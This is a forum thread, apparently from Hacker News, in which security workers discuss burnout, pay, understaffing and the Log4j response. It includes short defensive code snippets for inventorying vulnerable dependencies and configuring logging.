Security experts who possess a strong programming background are quite rare. It’s been a huge advantage for me personally.

The most straightforward way into appsec might be to get your OSCP. People will take you seriously if you're a senior dev and have that cert. I hear it's a beast, but it can be done with a few months of serious effort.

As for pay, it's hard to tell because devs have a wide range. I make ~170k and live in Atlanta, for reference, after 4 yrs of experience.

The roles that come my way are between 150k-225k. Obviously if you can land a FAANG role the compensation can be much greater.


> I make ~170k and live in Atlanta for reference after 4 yrs experience.

Holy cow, that's much better than I figured. I make that much and I have 15 years of dev experience. I live near Portland, OR and work for a company based in LA. Portland's cost of living is much higher than Atlanta too so you're doing really well.

My work-life balance is excellent, so that was really my main concern, but sounds like yours is just about equal if not better. Thanks for your response, I think I'll have to seriously consider a transition now.


What do you do now?


I’m an AppSec engineer and the bulk of my work is application pentesting/security assessments.

Even within appsec the roles can vary quite a bit…some folks just do sdlc security for example.


I'm not a worker but it sounds similar to the Mad Gadget remote code exec bug in Apache Commons Collections that was discovered five years ago. I wrote a blog post about it. https://opensource.googleblog.com/2017/03/operation-rosehub.... Back when I worked at Google, we sent pull requests to about 2,600 open source projects. The thought never really crossed our minds to blog about it publicly. The problem is that people just kept getting hacked, because these Java core libraries are everywhere. Looking back to Mad Gadget should give us some idea of what to expect. I can't tell for certain but this Log4j RCE could be worse since Apache says it can be triggered not just by the format string but also by the log parameters. However I'm not sure what they mean by LDAP since I wouldn't have thought that'd intersect with a logging library. https://logging.apache.org/log4j/2.x/security.html


I gave up on continuing into cybersecurity after just my first experiences several years ago. I keep up with people though (of the 15 I knew, 4 have quit, one even going into construction work, and 2 committed suicide). I now consider it basically the IT janitorial department: with the budget and control the department gets, the only thing you get to do is fling feces at the wall (an analogy for the reports on things that need fixing but never get done because, pick one):

1. Not budgeted for.

2. Too much downtime (an excuse even on systems that are fully load balanced).

3. "Whhhhnnn, but we need that legacy system" (which is real, because if it goes down the whole network does).

4. This doesn't sound critical, let's bring it up next year.

5. Because I (non-techy boss man) said we're not going to do it. As a matter of fact, I am going to sue HIPAA, or PCI, or some regulatory agency for governmental overreach of a proper business.


Log4j vulnerability became big news Friday evening. I did not have a weekend. Monday I went to bed at 3AM (technically Tuesday) and I was up at 8. It’s midnight and I am not yet done for the day.

Am I okay?


You might not be. Make sure you take some time off after this. You deserve it.


Hopefully you are at least hourly and make up for it with sweet overtime. I apologize deeply if you are salaried.


Take rest! There will be another one of these and more work to be done in future.


Thank you for your service.


It happens once in a while.


I think it depends on your job. As someone working in operations, I constantly feel that business and developers are pushing solutions far beyond what can be safely supported. With stuff like Docker, Kubernetes, and DevOps, developers have failed to understand that much of the security responsibility has shifted from Ops to Dev. Did I patch the OS? Yes, of course. Did you update your container in the last few months? If not, then why the F… does it matter if I patched the OS?

On the other hand, my colleagues who hunt for hackers, do forensics, and help customers who are or have been attacked are having the time of their lives. Rarely do you see people as excited about their work as these guys were this weekend.


I work for one of the OS makers, and we have been making a concerted effort to get rid of memory-safety issues across the codebase. I'm not sure if the open-source side of things is attempting similar efforts, but as far as consumer OSes go, I have seen a lot of improvement over the last 10 years.

I feel bad for anyone working in an org that doesn't have the ability to proactively find bugs in their stuff. Lots of places are cheap and don't account for the debt they accrue by not updating their systems. "If it ain't broke, don't fix it" doesn't apply to software: what you are shipping is always broken. "Safe" languages are written in unsafe languages. The interpreter has bugs, the VM has bugs, the virtualization stack has bugs, the OS has bugs, the libraries to do everything have bugs. What is there and what is known are both moving targets. If you are not hiring the offensive-minded individuals who will find the bugs with or without your support, then you will not know about the bugs until they are out in the wild. If you aren't willing to pay those people, you are accruing debt that will come due later.


No, No we are not.

There has been serious underspending by companies for cybersecurity for at least a decade now. Companies are slowly waking up to the fact that the security team can't be less than 1% the size of the development team.

Companies have let developers do whatever they want for so long that when infosec comes in and says "we need to change this so we have better visibility into what is being used, and how", it's "Oh, this will hurt productivity, so no".

The shit I have heard because companies don't want to spend money on cybersecurity - because putting out new features is more important than something that "might" happen... They just keep spending more on endpoint security and letting everything inside do whatever it wants.

And why would they? Bad hacks blow over after a year or two. Equifax is still ticking along, so is Citibank, so is Capital One. Nobody cares if you get hacked; just pay a fine, give it some time, and things will go back to normal.


The only truly new thing in the last year is that it's in the news. The reality was always full of breaches and security holes. The paragraph you quote is mostly just inflating the issue in a typical journalistic manner.


This is somewhat of a bottleneck moment: a lot is happening, demanding constant attention from the frontline, yet budgets and resources are still fairly bad all around.

Saying "bottleneck" implies an expectation of a better future ahead, but so far there are very few repercussions for neglecting this stuff, so it's unclear whether things will improve or just get worse.


In my experience of almost a decade in infosec now, no, we're not okay. I don't know any other group where so many people are struggling with burnout or who have developed a drinking habit because of their jobs. Might be selection bias, but this industry eats people alive, more so than others.


"Organizations are now in a race against time to figure out if they have computers running the vulnerable software that were exposed to the internet."

Large orgs should already have sufficient documentation as to which packages and versions are in use and what systems pulled them from their proxy repo.


> Large orgs should already have sufficient documentation as to which packages and versions are in use and what systems pulled them from their proxy repo.

Key word there: "should".

Let's say you have all your 50,000 applications well-documented. You think those docs are all going to be searchable in one place? That's an information disclosure vulnerability! No, all 50,000 applications' documentation will be siloed and only accessible to a select few people who work on them (you hope).

So now something like the log4j vulnerability crops up: You need to find out which systems are using log4j and what version. Best you can do is ask around... Demand that every application team cough up the details ASAP.

Now let's say you get data (emails) back suggesting that 5,000 applications are using log4j for certain, 1,000 may be using it (they're Java based apps), and you've confirmed that 14,000 most certainly are not using it. That leaves 30,000 applications where you have no idea if they're vulnerable.

You get data from the Artifactory ("proxy repo") team and they tell you, "we have 150,000 servers that have pulled down log4j (various versions)." Well, that's not particularly helpful so you get the raw data and try to correlate servers to applications only to find that's not helpful either: Because multiple "applications" could be using the same server and just because a log4j version was pulled doesn't mean it's actually being used by anything (in production).

After a few days of investigating the issue you find out that some thousands of applications actually are using log4j but it was included as part of a dependency. You tell them to update it.

Then you find out that 10,000 applications at present have no active development teams which explains why you got no response. Then there's an ungodly number of applications where no one has access to the source code anymore, 3rd party applications, etc.

So even if you have a central proxy repo and excellent documentation on all your stuff that doesn't mean it's going to be easy to hunt down and patch everything (that needs to be patched).
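To make the correlation step concrete, here is a minimal sketch (hosts, artifact names, and the fixed-version threshold are all hypothetical) of turning raw proxy-repo pull records into a starting list of suspect hosts - which, as above, still only tells you who pulled a vulnerable jar, not who actually runs it in production:

```python
from collections import defaultdict

# Hypothetical rows from a repo-proxy access log: (host, artifact, version)
pulls = [
    ("app01",   "log4j-core", "2.14.1"),
    ("app01",   "log4j-core", "2.17.0"),
    ("app02",   "guava",      "31.0"),
    ("batch07", "log4j-core", "2.11.2"),
]

def suspect_hosts(pulls, fixed=(2, 17, 0)):
    """Map each host to the pre-fix log4j-core versions it ever pulled."""
    hosts = defaultdict(set)
    for host, artifact, version in pulls:
        if artifact != "log4j-core":
            continue
        if tuple(int(x) for x in version.split(".")) < fixed:
            hosts[host].add(version)
    return dict(hosts)

print(suspect_hosts(pulls))  # -> {'app01': {'2.14.1'}, 'batch07': {'2.11.2'}}
```

Note that app01 shows up even though it later pulled a fixed version - exactly the ambiguity described above.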


Pretty sure the various organizations within the enterprise had an individual responsible for their domain. At worst, it's a Bitbucket search within one's org/domain for the library. The testing is the more complicated part.

It's not an easy situation either way, but the identification portion should be trivial.


Depends on how the organization grew, and if they have unified processes across department.

AFAIK the IT security folks at a financial institution that I used to work at are living in hell at the moment. That organization grew internationally through acquisitions across more than 80 countries, and lacks unified structure across the entire organization due to legal and compliance constraints unique to each jurisdiction.

A web development shop I provide security guidance to (owned by one of my TTRPG buddies) had to do a couple of searches in GitHub and update some hardware as patches became available. We made sure he was sorted out over a couple of drinks before we played board games.

It varies.


That does sound like a nightmare.


Sure. We have a codebase and app stack that has grown over 40 years. Responsible Parties have come and gone, sometimes handing off ownership responsibly, but often there wasn't enough time. So someone may be "responsible" for application X, but they haven't looked at the code in any detail. Or application X was installed by a vendor who provided documentation back in 2002 that is long gone.

Nothing is trivial in large organizations.


I mean, we could say nothing is ever trivial, period.


I'm not technically a cybersecurity person, but yeah, I'm working through the holidays to make sure a portfolio of container images, vSphere templates, AMIs, OpenStack Glance images (anywhere log4j can be hiding) is cleaned out or revved up. I'm getting despondent, and was really looking forward to the first mental break this year. I'm bad at pushing back, and don't get anything personal out of playing the martyr. I'm good enough at my job to be the person who has to fix it on Christmas, but not important enough to be the person who can refuse to.

I know I'll see half of y'all online with me :-/


Entry level churns out, on average, in a year. There are other reasons for that too, but it's not a carefree job. I love helping the analysts who use us, but it gets frustrating seeing how many of them are treated.

Developers make products: they are indirect profit centers, and while everyone sees room for improvement, get treated relatively well.

Conversely, outside of areas like finance, big tech, and government, sec teams get starved and ignored as cost centers. Their event-log DBs (SIEMs) are often from 15+ years ago and might even be SQL-based (think MySQL, not BigQuery), if they even have one.

Not fun even before all this - automated attacks with bad support have been going on for years.


I'm not a cybersecurity worker (although I would like to be), but I work with them. There's been a lot of activity, but I wouldn't say they're more stressed than normal. We did have some log4j stuff, but to my knowledge we weren't affected by the Exchange Server or SolarWinds exploits. News outlets are generally going to exaggerate and use hyperbolic language to make things seem as exciting as possible ("organizations are now in a race against time") in order to get more clicks.


I reckon the scale is simply not linear.

The likes of FAANG or banks have a big target painted on their backs, so they are scrambling for cover. However, the overwhelming majority of other businesses are not under similar pressure, because it's unlikely they will be targeted first - if at all.

I was actually talking about this with a friend who works for a company that provides a few niche services. They've had log4j 1.x in production for eons, which is also vulnerable to bad remote exploits, and nothing ever happened - simply because hackers are extremely unlikely to target their services. Obviously it doesn't mean they shouldn't upgrade, but the pressure is basically not there - at least until something Really Bad actually happens. He was actually pissed off at his manager making a big deal out of this exploit simply because it ended up in the mainstream press.


True. And some apps using log4j2 might escape user input in a way that lets them keep using the flawed versions and stay safe. I believe there is just one known theoretical exploit of 1.x, relating to its socket server. 1.x isn't supported anymore and 2.x is recommended, but I wouldn't call that a security flaw if you use it.



Infosec emotional climate always had a certain pessimistic, paranoid and panicky perception from the outside, but it is greatly exaggerated, I think.

FUD, bullshit, lack of skilled people, lack of budgets, lack of understanding from adjacent departments, chaos, mayhem, overtime, incidents, and a creeping "I'm not sure what's going on" have always been parts of the profession. Learning to accept frustration, constant change, ill-formed perception, and rejection is part of your career choice and a selection factor in the long term. Learning to look at the world from a certain angle that is hard to unlearn (especially if you're good at it) is the mental equivalent of a firefighter's calluses.

If you can bear with it all, being on the defensive side - a kind of digital first responder, regardless of where exactly you are in the industry - is a fun job and a calling for some.

(Edits: Typos)


I would say that security ops (SOC and Vuln mgmt in particular) at a small/medium sized company has to be kind of awful all the time. There is never enough time, funding, or management support to make meaningful change. This is further exacerbated by the fact that once you get a headcount or two, it can be exceptionally difficult to find qualified people (and those people are expensive). I did this type of work for 5ish years, and while I would never trade the experience for anything, I am glad to have moved past that point in my career.

Now, I write software for a niche Information Security team at a Fortune 250. I am still impacted by these major events, but it is usually in the form of "can we add X detection for Y vulnerability". The work is challenging/enjoyable but I am still able to maintain a good work/life balance.


I think the industry really f'ed itself by not developing pipelines to onboard security staff when the shortage of professionals was first acknowledged years ago. Look at this research report from over 10 years ago discussing it as a problem[1].

Yet here we are, talking about burnout with more than a few people ITT _still_ talking about teams being understaffed.

Meanwhile, there is no shortage of people obtaining credentials and education in cybersecurity who have nowhere to go, because many parties consider these effectively worthless. So what's the answer, when the onus of training has shifted to workers but none of the major players want to develop these people?

[1] https://www.csis.org/analysis/human-capital-crisis-cybersecu...


We have an open-source PHP application, and we've been fielding dozens of questions asking if the app is vulnerable - even from IT managers and sysadmins who, in my mind, should know better.

This has me thinking no one cares anymore about the stack of software being used - it's almost sad to think how much worse it's going to get with the insane dependency trees software comes with nowadays.

I'm thinking there's a business opportunity for someone to curate a list of software and its dependencies and provide a subscription service for vulnerability alerts on the stack of said software.

PS: Looks like VulDB [0] is halfway there, but I wonder if they alert based on dependencies, or even on the version of said application/product.

[0] https://vuldb.com/?kb.alerting
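Some of the plumbing for such a service already exists: OSV.dev, for example, exposes a public query API keyed by package and version. A rough sketch (the package coordinates below are just an example) of the per-dependency check such a subscription service would loop over a customer's lockfile or SBOM:

```python
import json
import urllib.request

OSV_URL = "https://api.osv.dev/v1/query"

def build_query(name, version, ecosystem="Maven"):
    """OSV query payload for one pinned dependency."""
    return {"package": {"name": name, "ecosystem": ecosystem},
            "version": version}

def known_vulns(name, version, ecosystem="Maven"):
    """POST the query to OSV.dev and return the list of matching advisories."""
    req = urllib.request.Request(
        OSV_URL,
        data=json.dumps(build_query(name, version, ecosystem)).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read()).get("vulns", [])

# e.g. known_vulns("org.apache.logging.log4j:log4j-core", "2.14.1")
# would include the log4shell advisory among its results.
```

The alerting part is then just re-running this on a schedule and diffing against what you reported last time.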


I left cybersecurity, specifically application security, because it felt like screaming into a void with no one listening. Well, once in a while the void would scream back about deadlines and deny problems exist. It was very demoralizing to work hard to not only identify vulnerabilities but also to filter out false positives and come up with remediation and education plans to correct and prevent future vulnerabilities only to have that work ignored and tossed aside. As security debt grew and grew, I myself grew concerned that if a breach happened, my purpose would be to be the fall guy despite the amount of evidence I had showing I did my job but was ignored. So I left and am looking for a new path, probably in data visualization.


I used to work at a cybersecurity company but have since switched jobs. Personally I don't identify that much with the field, although I have always taken security seriously and developed my own approach. Still, people frame me as the cybersecurity guy, which has been particularly weird with friends who constantly mention it and ask me about hacking. At work, having no formal certifications, I have limited leverage anyway, but I'm often shocked at how poorly security matters are dealt with. I left my last job, so I get to enjoy watching from my sofa right now.


It really depends on where you work.

At my previous job, everything fell on deaf ears and I wasn't given access to the things I needed to make sure things were secure. I couldn't access the Jira boards for the projects I was supposed to secure to create tickets for security remediations, and issue reports were ignored.

Where I'm at now is better. I can create the tickets, but they tend to get ignored until I tag the PM for them to get assigned, after which they typically get fixed pretty quickly.


Depending on what your job role is, this last weekend probably sucked. But IMO it's also pretty typical that a few of these sorts of events happen every year.

Reminder that this exists: https://paulbellamy.com/vulnerability-name-generator


- It's not my fault: check

- I'm busy: check

- Making money: check

At some point we need to stop the coddling. Sink or swim people.

¯\_(ツ)_/¯


> With so many large scale hacks, 0-days, and breaches happening these days, are cybersecurity professionals ok?

As an industry? We are getting better. Better recognition of neurodiversity, and of each other's needs and capabilities. Better at calling out the bad actors who can be poison pills in our teams, companies, and communities. Better at mentoring folks who are coming up in the industry.

None of that changes the disastrous toll that the security industry can take on individuals. Incident responders and investigators often have to deal with many of the same psychological issues that police officers do (exposure to CSAM, graphic imagery, deep knowledge of cybercrime and its relationship to real-world crime, including human trafficking, drug trafficking, etc.). Add the stress of working in sensitive roles where you can't share or talk about things, and, in the case of many colleagues (at least in Canada and the United States), having access only to work-approved "counselling services" as opposed to actual mental health professionals with a direct clinician-patient relationship.

Many IT security folks work in teams that are under-resourced, function as "teams" of one, and are often expected to fulfill the roles of SRE, IT support, architecture, engineering, and compliance for any technologies or tools they use to do their jobs, in addition to actually doing their jobs.

It gets to be a bit much at times :)

> Have studies about the mental health and anxiety levels of this group of professionals been conducted?

I don't know if there are any formal, rigorous, academic studies, but mental health in the cybersecurity space has been a long discussion, with the earliest significant discussions I remember being back in 2008-2009 at some conferences.

Depending on the role and the organization it can be a high-stress job. I often tell a story at talks and conferences about my 72-hour work day, which was my first incident response activity early in my career. It involved life-critical and personal safety systems affecting thousands of people, and I ended up working with the team for literally 3 days straight with no sleep because no one else on our team had the perspective needed to address the issues. There was serious physical fallout, as well as mental issues (I developed aphasia for a short period of time, amongst other things). Many of the folks I know in the industry have similar stories (though not as grim as a full 72 hours), and that's setting aside the toll of building a career on telling people that there are big issues, and having to be helpful and constructive instead of saying "I told you so..." when things go poorly.


Thanks for asking! Busy like a sailor with two dicks in a whore house, but hey, at least I still have a good job.


> With so many large scale hacks, 0-days, and breaches happening these days, are cybersecurity professionals ok? Have studies about the mental health and anxiety levels of this group of professionals been conducted?

Yes. Risk is the primary part of the job, and the job is lucrative.

In other words, it's business as usual.


Lots of pandemic downtime gave hackers and script kiddies more idle time to sharpen their tools and tricks, and more businesses moving online creates a larger attack surface (even though we only hear about the big ones getting hacked).


Well, I left it in early 2021 due to burnout, so... no, not really. The cybersecurity industry is not okay, in terms of mental health.

The major contributing factors for me:

- Reactive panic instead of proactive strategy

- - Detail: The suits in most economic sectors have zero interest in investing in security and best practice ahead of time, preferring to sell buzzwords to customers, and engaging in actual security only reactively. This leads to lots of scrambling and working weekends for cybersecurity professionals.

- - Example: I can't tell you how many times I heard companies say "AWS handles our security." This is virtually never true (under AWS's shared responsibility model, securing what runs in the cloud is still the customer's job), and the realization that it's a fallacy led to many panicked board meetings and embarrassing disclosures.

- Budget by buzzword

- - Detail: The latest cyber machine learning web 2.0 agile next-gen thing will always get the funding, while tried-and-true practices like a good NIDS/HIPS pairing and a robust incident response process are relegated to the budget back seat.

- - Example: Much of my time was for a government agency, and it was consistently easier to get funding for security hardware than for people. As a result, we often ended up with amazing, sexy, buzzword-covered hardware, and absolutely nobody (or nobody trained) to actually monitor it or analyze the data it produced.

- Ambulance-chasing parasites

- - Detail: Name a major cybersecurity incident that hit the public consciousness between 2015 and 2020, and I can name at least a dozen startups that cold called me over the next three months offering to address the problem for our organization, and prevent it the next time. These ambulance-chasing companies offer very little real value, and often drain resources from real improvements in an organization's cybersecurity posture.

- - Example: WannaCry/EternalBlue. I received months and months of aggressive marketing promising to fix this across our org, to the point that dodging the spam calls actually interfered with the on-the-ground work of patching endpoints and monitoring for IoCs.

This was my own experience, and may well not be representative of what others have gone through... but after years of 2am NOC calls, all-weekenders, being treated with disdain by other disciplines, and watching org funds consistently get flushed away on snake oil, I threw in the towel and switched industries. I took two decades of IT experience with me when I left. Now I'm paid better, and I'm in a much better place health-wise.


We have a good security posture and a large ops team. We were unaffected by most of the large exploits this year. PrintNightmare was a PITA, but I agree with the other commenters that a lot of the news is hyperbolic.


Perhaps, but this year has been objectively bad with regard to security issues, even when fully patched.


There are tons of talks on burnout and mental health; it's a common problem. That said, it's less stressful for me now in some respects than when I was purely on the ops side.


I would expect that a large portion of cybersecurity workers are far too busy trying to properly address Log4shell issues at their organizations to be posting on HN


Most of them are wasting time remediating applications that can't be exploited.

If only we had sanitized our inputs.

We sanitized all the form parameters! Did you sanitize the user agent string? What.

This is one of the reasons why I avoid log4j and log4net like a real weirdo. People use a logging framework because they're supposed to--so we can send logs somewhere sensible instead of paying a billion dollars to suck files from an EC2 instance into Splunk. We use log4j and still spend a GDP on Splunk sucking in files.

99% of these people running around with their hair on fire could have just written to a log file with three lines of code. Instead they mvn in a whole fucking library for no reason.

Well, they were supposed to. It's the right thing to do, according to some blog posts.
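For what it's worth, the no-framework version being argued about here can be sketched with the JDK's built-in java.util.logging (a sketch only; the file names and limits are illustrative):

```java
import java.util.logging.FileHandler;
import java.util.logging.Logger;
import java.util.logging.SimpleFormatter;

public class PlainLogging {
    public static void main(String[] args) throws Exception {
        // java.util.logging ships with the JDK, so there is no extra dependency to patch.
        Logger log = Logger.getLogger("app");
        // Size-based rotation: up to three 1 MB files named app-0.log, app-1.log, app-2.log.
        FileHandler handler = new FileHandler("app-%g.log", 1_000_000, 3, true);
        handler.setFormatter(new SimpleFormatter()); // plain text lines instead of the XML default
        log.addHandler(handler);
        log.info("service started");
    }
}
```

Granted, it's a few more than three lines once you want rotation and formatting, which hints at why frameworks exist at all.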


> 99% of these people running around with their hair on fire could have just written to a log file with three lines of code. Instead they mvn in a whole fucking library for no reason

The fact that you think there is "no reason" to address logging through anything other than three extra lines of code shows that you really have no comprehension of how or why logging frameworks provide benefits (even if some of the inclusions like JNDI are ludicrous and should have been defaulted off, or even put behind a build flag, with big red warning labels).


Of course I do. Just that 99% of the people wasting their life and money remediating this issue did not need any of that, certainly didn't use most of it, and definitely didn't need the features causing this mess.

I have yet to stumble on an app that uses any logging features other than writing to a file. And yet the default is to mvn log4j to do that because they don't want to look foolish doing it the simple way or "they might need it."


Congratulations! log4j is too feature-rich to satisfy the requirements of your limited experience!

The JNDI string expansion and lookups were a pants-on-head stupid feature, but having highly configurable logging is super helpful when building and debugging systems at scale, both when you are building and testing and when you are scaling up, so that you can granularly tune what is logged and where. This is true whether it's written in Python, Go, Rust, C, or any other language. If you don't know that, then perhaps you should try branching out in your experience.


Sanitizing inputs requires you to know what you're sanitizing against. Nobody knew about all these expressions that log4j would accept anywhere until a few weeks ago, so nobody could have sanitized them out of inputs.

Logging to a text file is nice for a toy app. For large-scale production apps, you're going to need log rotation so you don't overwhelm your disk space, transport to a centralized service for aggregation and bulk querying, and a good mechanism to append tags about the request, service, instance, etc. to the log data to make it easy to query. That's not so easy without a nice logging framework.
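To make that concrete: the rotation, tagging, and per-component tuning are exactly what a framework config buys you. A log4j2-style sketch (paths, sizes, and logger names here are made up for illustration):

```xml
<!-- Illustrative log4j2.xml sketch; names and limits are examples, not recommendations -->
<Configuration>
  <Appenders>
    <RollingFile name="app" fileName="logs/app.log"
                 filePattern="logs/app-%i.log.gz">
      <!-- %X pulls per-request tags (e.g. a request id) from the MDC -->
      <PatternLayout pattern="%d %p %c %X{requestId} - %m%n"/>
      <Policies>
        <SizeBasedTriggeringPolicy size="100 MB"/> <!-- rotate before disks fill up -->
      </Policies>
      <DefaultRolloverStrategy max="10"/>
    </RollingFile>
  </Appenders>
  <Loggers>
    <!-- Granular tuning: quiet one noisy component without touching the rest -->
    <Logger name="com.example.noisy" level="warn"/>
    <Root level="info">
      <AppenderRef ref="app"/>
    </Root>
  </Loggers>
</Configuration>
```

None of this is hard-coded in the app, which is the point: you retune it per environment without a rebuild.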


> “Organizations are now in a race against time to figure out if they have computers running the vulnerable software”

As a client platform engineer for the last couple years, patch management / versioning is one of my primary job duties. Are there cybersecurity “professionals” out there enjoying hefty pay raises for doing a job someone at their organization is doing for them?

Perhaps I should change my job title to “Cybersecurity Analyst” and get an extra $30k per year for the same thing I’m already doing.


They are crying all the way to the bank.


Cybersecurity has always been an area that requires a particular intellectual mindset and emotional gutset. When I was consulting (~20 years of it), people often said to me "that must be so satisfying!"

My stock answer was "yeah, well, it depends on the day: On a good day, you're saying the same thing to new people. On a bad day, you're saying the same thing to the same people."

Those repeat conversations were often after an incident. The <insert fairly senior to C suite executive title here> would ask "how could this have happened" and I would say something along the lines of "<sir/ma'am/Alice/Bob, as appropriate>, do you remember my presentation and report of about 6 months ago when I mentioned that X-Y-Z required remediation and both greater control depth and greater control strength? Q hit Y, which hadn't been remediated, and that's why we're here...".

IF you can report to a interested and motivated executive with pull and credibility and IF the organization has risk governance and understands its risk tolerance and IF people understand the differences in various degrees of injury and IF people understand the differences between mission-critical and mandate-vital OR people are at least willing to learn what these things are AND willing to put in place the structures that support analysis, remediation, continually, forever, THEN, yes, it can be very satisfying.

(I taught for CSE for a few years, from beginner-level intros to in-depth multi-day courses for SMEs. I almost always made sure to include in every deck that one slide that showed the relationship between law, enabling legislation, central policy, departmental policy, governance, and risk tolerance and management. I'd say something along the lines of "if your department/agency/organization/unit does NOT have this, then the first document you should prepare is your CV....)

As to me, I'm doing OK, because I joined a cyber startup 1.5 years ago. Our hardware product is a unidirectional gateway (think diode with extra management capabilities on either side), our software product is a wicked cool (if I do say so myself) IRM/GRC/ComplianceManagement engine with integrated visualization and workflow, so I get to do really cool stuff all the time. And fortunately, we aren't subject to this one, so no one lost their weekend. Well, not because of this.

But only OK, because a) plague, b) some of the lovely bonus situations that come with age (related to both one's health and the health of one's loved ones), and c) startup, with all that implies, especially with A and B. Fortunately, I have great colleagues and a fantastic boss, so that makes it easier, but, still, it's a lot.


not ok.

Mid-level managers aren't being all that helpful, since they have little understanding of our job. We are understaffed and underfunded.

High-level managers and executives continue to push ever more unreasonable objectives, targeting nonsensical numbers such as 40% operational margin and double-digit growth.

HR is more interested in our adherence to inclusive language at work and whatnot than in our mental well-being and productivity.

Our company is threatening all employees over compliance with the vaccine mandate in the US (for sure some employees will leave, making the understaffing worse).

The number of attacks is on the rise, probably because more people stuck at home are converting to cybercrime.

There's more politics at work, with more junior engineers playing the politics game to shine rather than slowly sharpening their technical skills.

More of the engineers who do most of the work have started to give up: simply logging in, attending meetings, pretending to do all they can, but in fact doing the minimum they can get away with. Hence more pressure on those who haven't given up yet.

Cyber attacks have always been on the rise, and they will continue to rise in number as we continue to digitalise our lives, but over the last couple of years I've seen a drastic descent into mismanagement, and increased pressure on employees in order to increase profit, which has led to the opposite result in absolute productivity.

I only expect things to get worse before they get better. Daring to make these remarks at the workplace could easily cost someone their job; at the very least they'd be ostracised by management for spreading negativity and exaggerations.

I don't think this is only happening in the cybersecurity industry, some people I know even outside of tech are telling me they witness similar trends.


It is true that overtime is nearly constant; personally I would compare it to Y2K happening every month. Rallying the staff once is one thing, but the repeated drumbeat of something hitting the fan in one part of the tech stack after another is plainly exhausting.

Heterogeneous tech stacks have benefits and drawbacks, and we're seeing the drawbacks play out in real time as increased risk.


As IT workers in general we have numerous advantages over most people.

First, we can work remote. Compare that to a fast food worker who has to risk exposure to feed their family.

Second, if you spend your money right you can say f it and leave any job that's too rough.

I was actually thinking of taking 6 months off, until I realized travel is still restricted


Remote probably hurts in a log4j situation. There's no separation between work and home. You are expected to be ready at the drop of a hat.


It doesn't hurt actually. During major incidents in my non-remote roles I was expected to be in the office and available for the duration of the active incident, even if I wasn't able to actively contribute (contrary to what folks may have seen on NCIS, having two people typing on the same keyboard is not actually helpful when fighting hackers :P )

As a remote worker I can be at home and present with my family, with short breaks for actual activity and longer periods for active response. This is not speculation - I have been active on incident response in the last month while helping my kids with homework, side by side at my home office desk.


It's a fundamental and systemic problem.

We have a ton of software written in unsafe languages (C and C++): our operating systems, web browsers, email readers, file editors, etc. Our governments and cyber-criminals have stockpiled 0-day exploits against these unsafe systems. They have hundreds or maybe thousands of these exploits.

On top of that, businesses want features added to user-facing apps as fast as possible (beat the competition). These apps sit atop the unsafe C operating systems and often run as root or Administrator. These apps have many logic flaws. Governments and criminals have stockpiled 0-days against these flaws as well.

So until our systems and apps are rewritten in safe languages (Go, Rust, C#, Java), most processes run in an unprivileged context, and mandatory access control (MAC) is applied to all running processes (all the time), we will continue to be hacked in ever-growing catastrophic ways.

IMO, this may be the explanation to the Fermi paradox. The aliens did themselves in with insecure software.


How many of those mitigations would've stopped the log4j misfeature? It was in Java, there is an access control to turn off JNDI lookups (which was itself off by default, for some stupid reason), etc.
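(For the record, the switch in question is log4j2's formatMsgNoLookups setting, added in 2.10. It was the widely shared stopgap during the initial response, though it was later judged insufficient on its own and upgrading became the standing advice; treat this as historical, not current guidance.)

```shell
# Stopgap mitigations circulated during the initial Log4Shell response
# (log4j 2.10-2.14.x only; upgrading log4j was the real fix).

# JVM flag form, shown for reference:
#   java -Dlog4j2.formatMsgNoLookups=true -jar app.jar

# Equivalent environment variable, read by log4j at startup:
export LOG4J_FORMAT_MSG_NO_LOOKUPS=true
```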


A MAC in enforcing mode would have prevented it.


>We have a ton of software written in unsafe languages (C and C++).

That's one of the favorite stances to take here on HN, and is driving the adoption of .NET, Go, Rust, etc (as far as I, a mere Pascal programmer, can tell)

It is not, however the root cause of our cybersecurity woes. It's ignoring the principle of least privilege at all levels, especially that of the OS kernel.

Instead of trying to rewrite everything in a "perfect" language, it would be far wiser to redirect some of this effort towards adopting a microkernel/capability-based OS such as Genode, Fuchsia, etc.; there's a handy list at

https://en.wikipedia.org/wiki/Capability-based_operating_sys...



